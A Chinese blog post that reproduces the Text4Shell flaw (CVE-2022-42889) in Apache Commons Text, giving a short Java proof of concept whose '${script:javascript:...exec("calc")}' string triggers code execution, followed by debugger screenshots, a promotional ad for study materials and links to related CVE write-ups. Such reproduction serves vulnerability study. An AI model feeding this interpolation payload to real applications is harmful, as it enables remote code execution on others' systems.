CVE-2022-42889 Apache Commons Text【漏洞复现】_cve-2022-42889复现

于 2024-05-16 15:11:34 发布
阅读量465 收藏 5
点赞数 3
分类专栏: 程序员 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84971828/article/details/138962407
版权 

poc.java

import org.apache.commons.text.StringSubstitutor;
public class A {
public static void main(String[] args) {
StringSubstitutor stringSubstitutor = StringSubstitutor.createInterpolator();
String str1 = “${script:javascript:java.lang.Runtime.getRuntime().exec(“calc”);}”;
String str=“PoC Output: ${script:javascript:195 + 324}”;
String output = stringSubstitutor.replace(str);
System.out.println(output);
}
}


### 0x02 调试


![](https://img-blog.csdnimg.cn/a4385716c1a5496abfa188b8b9c6a19a.png)


 ![](https://img-blog.csdnimg.cn/a2d5ac34810b4912a69a4451fceb8a6d.png)



![](https://img-blog.csdnimg.cn/3efc6207409f44a9b6e22794df2e8124.png)



![](https://img-blog.csdnimg.cn/f760bc689023495ba3ecbb21d0fb6938.png)



![](https://img-blog.csdnimg.cn/3e43aba72daf48679bcac4eb17d1edb3.jpeg)



![](https://img-blog.csdnimg.cn/a60a180262a9484b83efbe634b63441c.png)


 



点一下左侧的箭头,先查看下接口,有很多



 ![](https://img-blog.csdnimg.cn/b3177e5652244be1a0df4a8db5680525.jpeg)


在上一步调试跟进看看进了哪个实现类


![](https://img-blog.csdnimg.cn/6c5e1996d11a4f6d98a8650f34dfad2e.png)


==》ScriptStringLookup


![](https://img-blog.csdnimg.cn/4bddb00cc26b47aab2dd62b85caaa0ba.png)


 ![](https://img-blog.csdnimg.cn/a0e959e6c03a4fe881ac7dae670d5a0c.png)


**到这里就差不多了**,如果感兴趣 eval 的实现,可以继续调试:


![](https://img-blog.csdnimg.cn/66e3423194804e30bef7bb6cd62ca12a.png)



查找属性 “javax.script.filename” 如果没有此属性,返回 <eval> 标签:


![](https://img-blog.csdnimg.cn/69a54fac5d604cd0805d0733666e3a48.png)



![](https://img-blog.csdnimg.cn/596a2269b1a547b783e5d1e4c9ba9404.png)




![](https://img-blog.csdnimg.cn/7843fd7a83d1435aa0fd2fc0c4fcda49.png)


 ![](https://img-blog.csdnimg.cn/9d469052e50947419eae07375c6871e8.png)
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/5df6fa35cd295bcb94cdd64866ad7c50.png)

![img](https://img-blog.csdnimg.cn/img_convert/72f317ef62fce6af088abbcb0d53e0c5.png)

![img](https://img-blog.csdnimg.cn/img_convert/13646290d9d433ae3ca98fa31316a406.png)

![img](https://img-blog.csdnimg.cn/img_convert/72f80da1714bd16d3fb66217a7522e14.png)

![img](https://img-blog.csdnimg.cn/img_convert/b14b6cd12c9db2ba16d8f6fcf501c693.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84971828
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
Apache Spark 是一个流行的开源大...总之,Apache Spark 的命令注入漏洞 CVE-2022-33891 是一个严重的安全问题,可能导致数据泄露、系统被接管甚至整个网络的破坏。及时修补和实施适当的安全措施是防止此类攻击的关键。
CVE-2022-42889 Apache Commons Text远程代码执行漏洞复现
热爱学习,喜欢折腾!
10-18 2915
Apache CommonsApache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码。Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889)。
CVE-2022-42889 Apache Commons Text RCE漏洞分析
二狗的博客
01-31 2136
最近一直在对刚研发出来的自动化Web/API漏洞Fuzz的命令行扫描工具进行维护更新(工具地址:https://github.com/StarCrossPortal/scalpel),目前扫描工具已更新至第三个版本,新增了5条2022CVE漏洞POC,修复了例如Content-Type和body类型不一致等问题。最新版本测试稳定,满足Web/API的漏洞Fuzz和多场景的漏洞检测,欢迎大家试用。在维护更新扫描器POC库时,笔者看到了这个被称为“Textshell”的CVE漏洞,决定学习分析一波。
Apache Commons Text 任意代码执行漏洞复现(CVE-2022-42889)
LainWith的博客
10-21 3901
Apache Commons Text 是一个专注于处理字符串的算法的库。该组件中存在任意代码执行漏洞,若攻击者对StringSubstitutor处理的字符串可控,则可通过该漏洞在受害者机器上执行任意代码。
『Java CVECVE-2022-42889: Apache Commons Text RCE(Text4Shell)
Ho1aAs‘s Blog
10-24 2203
# 影响版本 Apache Commons Text ≤ 1.9 # 漏洞原理 插值器允许执行script 原理跟CVE-2022-33980: Apache Commons Configuration读文件RCE一样
『Java CVECVE-2022-41852: Apache Commons JXpath RCE
Ho1aAs‘s Blog
10-13 2315
影响版本 Apache Commons JXpath
[漏洞复现]Text4shell(CVE-2022-42889
qq_45751902的博客
11-28 3485
Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞CVE-2022-42889)。 Apache Commons Text版本1.5到1.9中,该问题的根源在于在DNS、脚本和 URL 查找期间执行的字符串替换方式可能导致在传递不受信任的输入时在易受攻击的系统上执行任意代码。 成功利用该漏洞可以使威胁参与者仅通过特制的有效负载打开与易受攻击的应用
『Java CVECVE-2022-33980: Apache Commons Configuration 读文件RCE
Ho1aAs‘s Blog
08-02 1723
从2.4版本开始,一直到2.7版本,默认的Lookup实例集包括可能导致任意代码执行或与远程服务器联系的插值器。这些查找器是-“script”-使用JVM脚本执行引擎(javax.script)执行表达式-“dns”-解析dns记录-“url”-从urls加载值,包括从远程服务器加载值如果使用不受信任的配置值,使用受影响版本中的插值默认值的应用程序可能会受到远程代码执行或无意中与远程服务器接触的影响。方法,也就是调用prefix对应插值器的lookup方法查找name对应的值。......
漏洞分析】Apache Commons Text远程代码执行漏洞CVE-2022-42889
olga5abl的博客
11-30 5193
这些查找是:-“script”-使用JVM脚本执行引擎(javax.script)执行表达式-“dns”-解析dns记录-“url”-从url加载值,如果使用不受信任的配置值,则受影响版本中使用插值默认值的应用程序,可能容易受到远程代码执行或与远程服务器无意接触的影响。并且这种插值器的性质意味着,将内容输入到易受攻击的对象中的可能性,比仅与Log4Shell中的此类字符串交互的可能性要小。通常在开发过程中用于占位符和动态获取属性的字符串编辑工具包,常用于数据库查询前的语句替换,或者页面输出时的替换。
CVE-2022-42889 Text4shell
最新发布
sinat_42420072的博客
01-25 1037
Text4shell 漏洞2022 年 10 月 13 日向 Apache 披露。Text4Shell 是一个影响使用 Apache Commons Text Library 某些功能的 Java 产品的漏洞,它可能允许远程攻击者在服务器上执行任意代码。
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值